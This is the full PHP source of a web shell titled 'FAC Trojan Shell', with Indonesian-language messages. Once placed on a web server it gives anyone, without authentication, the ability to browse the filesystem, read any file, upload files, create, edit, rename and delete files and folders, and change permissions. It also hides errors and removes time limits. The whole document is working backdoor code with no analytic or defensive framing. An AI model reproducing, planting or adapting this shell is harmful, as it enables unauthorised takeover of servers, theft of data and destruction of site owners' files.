exp

1. <?php
2.  
3. set_time_limit(0);
4. error_reporting(0);
5.  
6. if(get_magic_quotes_gpc()){
7. foreach($_POST as $key=>$value){
8. $_POST[$key] = stripslashes($value);
9. }
10. }
11. echo '<!doctype html>
12. <html>
13. <head>
14. <title>FAC Trojan Shell</title>
15. </head>';
16.  
17. ?>
18.  
19. <style>
20. @font-face {
21. font-family: 'Comic Sans MS';
22. font-style: normal;
23. font-weight: 400;
24. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
25. }
26. body {
27.  
28. background-image:url('https://s-media-cache-ak0.pinimg.com/originals/f5/83/01/f58301e339c92411de0fdc59219e3355.jpg');
29.  
30. }
31.  
32. table, th, td {
33. border-collapse:collapse;
34. background: transparent;
35. font-family: Comic Sans MS ;
36. font-size: 13px;
37. }
38. input, textarea { font-family: Comic Sans MS ; }
39. .table_home, .th_home, .td_home { color:grey;
40. border: 1px solid grey;
41. }
42. th {
43. padding: 10px;
44. }
45. .td_home { padding: 7px; }
46. select {font-family: Comic Sans MS }
47. a {color:white}
48. textarea { width: 100%;height: 400px; }
49. </style>
50. <?php
51.  
52. echo '</head>
53. <body><b>
54. <H1><center> &lt;/&gt; <font color="red">Shell</font> <font color="white">FAC </font></center></h1>
55. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
56.  
57. <tr><td>
58.  
59. <font color="green"><center>'.php_uname().'</center></font><br>';
60. if(isset($_GET['path'])){
61. $path = $_GET['path'];
62. }else{
63. $path =
64.  
65.  
66. getcwd();
67.  
68. }
69. $path = str_replace('\\','/',$path);
70. $paths = explode('/',$path);
71.  
72. foreach($paths as $id=>$pat){
73. if($pat == '' && $id == 0){
74. $a = true;
75. echo '<font color=#fff><center>$ root@fac : <a href="?path=/">/</a>';
76. continue;
77. }
78. if($pat == '') continue;
79. echo '<a href="?path=';
80. for($i=0;$i<=$id;$i++){
81. echo "$paths[$i]";
82. if($i != $id) echo "/";
83. }
84. echo '">'.$pat.'</a>/';
85. }
86. echo '</font></center></td></tr><tr><td><center>';
87. if(isset($_FILES['file'])){
88. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
89. echo '<font color="green">File Upload</font><br />';
90. }else{
91. echo '<font color="red">Upload Failed !!</font><br />';
92. }
93. }
94. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
95. <input type="submit" value="Uploadd" />
96. </form></center>
97. </td></tr>';
98. if(isset($_GET['filesrc'])){
99. echo "<tr><td><center>Current File : ";
100. echo $_GET['filesrc'];
101. echo '</center></tr></td></table><br />';
102. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
103. }
104. //Empety
105. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
106. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
107. //Chmod
108. if($_GET['opt'] == 'chmod'){
109. if(isset($_POST['perm'])){
110. if(chmod($_POST['path'],$_POST['perm'])){
111. echo '<font color="green">Change Permission Done </font><br />';
112. }else{
113. echo '<font color="red">Change Permission Error </font><br />';
114. }
115. }
116.  
117. $hell = $_GET['path'];
118. $yeah = $_GET['name'];
119. $patc = "$hell/$yeah";
120.  
121. echo '<form method="POST">
122. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
123. <input type="hidden" name="path" value="'.$_POST['path'].'">
124. <input type="hidden" name="opt" value="chmod">
125. <input type="submit" value="Go" />
126. </form>';
127. }
128. //
129. elseif($_GET['opt'] == 'btw'){
130. $cwd = getcwd();
131. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
132. New Name : <input name="name" type="text" size="20" value="Folder" />
133. <input type="hidden" name="path" value="'.$cwd.'">
134. <input type="hidden" name="opt" value="delete">
135. <input type="submit" value="Go" />
136. </form>';
137. }
138. //Rename file
139. elseif($_GET['opt'] == 'rename'){
140. if(isset($_POST['newname'])){
141. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
142. echo '<font color="green">Sukses Ganti Nama </font><br />';
143. }else{
144. echo '<font color="red">Change Name Error </font><br />';
145. }
146. $_POST['name'] = $_POST['newname'];
147. }
148. $hell = $_GET['path'];
149. $yeah = $_GET['name'];
150. $patc = "$hell/$yeah";
151. $new = $_POST['newname'];
152.  
153. echo '<form method="POST">
154. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
155. <input type="hidden" name="path" value="'.$patc.'">
156. <input type="hidden" name="opt" value="rename">
157. <input type="submit" value="Here!" />
158. </form>';
159. }
160. //File baru
161. elseif($_GET['opt'] == 'baru'){
162.  
163. $hell = $_GET['path'];
164. $yeah = $_GET['name'];
165. $patc = "$hell/$yeah";
166. $new = $_POST['newname'];
167. $azz = $_POST['path'];
168. $newz = "$azz/$new";
169.  
170.  
171. if(isset($_POST['src'])){
172. $fp = fopen($_POST['path'],'w');
173. if(fwrite($fp,$_POST['src'])){
174. echo '<font color="green">Create File Done [ '.$new.' ]</font><br />';
175. }else{
176. echo '<font color="red">Create File Error</font><br />';
177. }
178. fclose($fp);
179. }
180.  
181. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
182.  
183. $ho = $_POST['ngaran1'];
184.  
185. if(isset($_POST['ngaran'])){
186. echo '<form method="POST">
187. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
188. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
189. <input type="hidden" name="opt" value="edit">
190. <input type="submit" value="Go" />
191. </form>';
192. }
193. }
194. //Edited file
195. elseif($_GET['opt'] == 'edit'){
196. if(isset($_POST['src'])){
197. $fp = fopen($_POST['path'],'w');
198. if(fwrite($fp,$_POST['src'])){
199. echo '<font color="green">Edit File Done </font><br />';
200. }else{
201. echo '<font color="red">Edit File Error </font><br />';
202. }
203. fclose($fp);
204. }
205. $hell = $_GET['path'];
206. $yeah = $_GET['name'];
207. $patc = "$hell/$yeah";
208. echo '<form method="POST">
209. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
210. <input type="hidden" name="path" value="'.$patc.'">
211. <input type="hidden" name="opt" value="edit">
212. <input type="submit" value="Go" />
213. </form>';
214. }
215. echo '</center>';
216. }else{
217. echo '</table><br /><center>';
218. //Delete dir and file
219. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
220.  
221. $hell = $_GET['path'];
222. $yeah = $_GET['name'];
223. $patc = "$hell/$yeah";
224.  
225. //Delete dir
226. if($_GET['type'] == 'dir'){
227.  
228. if(rmdir($patc)){
229. echo '<font color="green">Delete File Done</font><br />';
230. }else{
231. echo '<font color="red#">Delete File Error </font><br />';
232. }
233. }
234. //buat folder
235. if($_GET['type'] == 'buat'){
236. $haaa = $_POST['path'];
237. $heee = $_POST['name'];
238. $hooo = "$haaa/$heee";
239. $new = $haaa.'/'.htmlspecialchars($heee);
240. if(!mkdir($new)){
241. echo '<font color="red">Create Folder Error</font><br />';
242. }else{
243. echo '<font color="green">Create Folder Done </font><br />';
244. }
245. }
246. //Delete file
247. elseif($_GET['type'] == 'file'){
248.  
249. $hell = $_GET['path'];
250. $yeah = $_GET['name'];
251. $patc = "$hell/$yeah";
252.  
253. if(unlink($patc)){
254. echo '<font color="green">Hapus File Selesai</font><br />';
255. }else{
256. echo '<font color="red#">Gagal Hapus File </font><br />';
257. }
258. }
259. }
260. echo '</center>';
261. $scandir = scandir($path);
262. $pa = getcwd();
263. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
264. <tr>
265. <th class=th_home style="background:silver;color:black;"><center>Name</center></th>
266. <th class=th_home style="background:silver;color:black;" ><center>Size</center></th>
267. <th class=th_home style="background:silver;color:black;" ><center>Perm</center></th>
268. <th class=th_home style="background:silver;color:black;" ><center>Options</center></th>
269. </tr> <tr>
270. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir">+ New Dir</a> </td></tr>
271. ';
272.  
273. foreach($scandir as $dir){
274. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
275. echo "
276. <tr>
277. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\">$dir</a></td>
278. <td class=td_home ><center>DIR</center></td>
279. <td class=td_home ><center>";
280. if(is_writable("$path/$dir")) echo '<font color="green">';
281. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
282. echo perms("$path/$dir");
283. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
284.  
285. echo "</center></td>
286. <td class=td_home ><center>
287. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\">Chmod</a>
288.  
289. </center></td>
290. </tr>";
291. }
292. echo '<br>';
293. foreach($scandir as $file){
294. if(!is_file("$path/$file")) continue;
295. $size = filesize("$path/$file")/1024;
296. $size = round($size,3);
297. if($size >= 1024){
298. $size = round($size/1024,2).' MB';
299. }else{
300. $size = $size.' KB';
301. }
302.  
303. echo "<tr>
304. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
305. <td class=td_home><center>".$size."</center></td>
306. <td class=td_home><center>";
307. if(is_writable("$path/$file")) echo '<font color="green">';
308. elseif(!is_readable("$path/$file")) echo '<font color="red">';
309. echo perms("$path/$file");
310. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
311. echo "</center></td>
312. <td class=td_home><center>
313. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\">Edit</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\">Chmod</a>
314. </center></td>
315. </tr>";
316. }
317. echo '</table>
318. </div>';
319. }
320. echo '<br><center>[ Tidak ada System yang Aman dalam dunia ini ]<br>&lt;/&gt; ERROR</b></body>
321. </html>';
322. function perms($file){
323. $perms = fileperms($file);
324.  
325. if (($perms & 0xC000) == 0xC000) {
326. // Socket
327. $info = 's';
328. } elseif (($perms & 0xA000) == 0xA000) {
329. // Symbolic Link
330. $info = 'l';
331. } elseif (($perms & 0x8000) == 0x8000) {
332. // Regular
333. $info = '-';
334. } elseif (($perms & 0x6000) == 0x6000) {
335. // Block special
336. $info = 'b';
337. } elseif (($perms & 0x4000) == 0x4000) {
338. // Directory
339. $info = 'd';
340. } elseif (($perms & 0x2000) == 0x2000) {
341. // Character special
342. $info = 'c';
343. } elseif (($perms & 0x1000) == 0x1000) {
344. // FIFO pipe
345. $info = 'p';
346. } else {
347. // Unknown
348. $info = 'u';
349. }
350.  
351. // Owner
352. $info .= (($perms & 0x0100) ? 'r' : '-');
353. $info .= (($perms & 0x0080) ? 'w' : '-');
354. $info .= (($perms & 0x0040) ?
355. (($perms & 0x0800) ? 's' : 'x' ) :
356. (($perms & 0x0800) ? 'S' : '-'));
357.  
358. // Group
359. $info .= (($perms & 0x0020) ? 'r' : '-');
360. $info .= (($perms & 0x0010) ? 'w' : '-');
361. $info .= (($perms & 0x0008) ?
362. (($perms & 0x0400) ? 's' : 'x' ) :
363. (($perms & 0x0400) ? 'S' : '-'));
364.  
365. // World
366. $info .= (($perms & 0x0004) ? 'r' : '-');
367. $info .= (($perms & 0x0002) ? 'w' : '-');
368. $info .= (($perms & 0x0001) ?
369. (($perms & 0x0200) ? 't' : 'x' ) :
370. (($perms & 0x0200) ? 'T' : '-'));
371.  
372. return $info;
373. }
374.  
375. ?>